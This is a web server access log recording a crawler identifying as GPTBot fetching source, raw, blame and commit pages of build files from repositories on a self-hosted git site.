"https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:16:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:16:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12039] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:16:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8484] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=name&state=closed" +[17/Feb/2026:16:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?page=2&tab=activity" [Client 74.7.227.38] [Length 8426] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:16:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:16:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11563] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html" [Client 74.7.227.38] [Length 32208] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html" [Client 74.7.227.38] [Length 57808] [Gzip 10.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:16:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?page=1&tab=activity" [Client 74.7.227.38] [Length 10045] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?page=2&tab=activity" +[17/Feb/2026:16:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11330] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12171] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11374] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11315] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11290] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11658] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16061] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11307] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13184] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10240] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10277] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10679] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14926] [Gzip 9.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12085] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10245] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11190] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10367] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10303] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10212] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:54:08 +0000] - 200 200 - 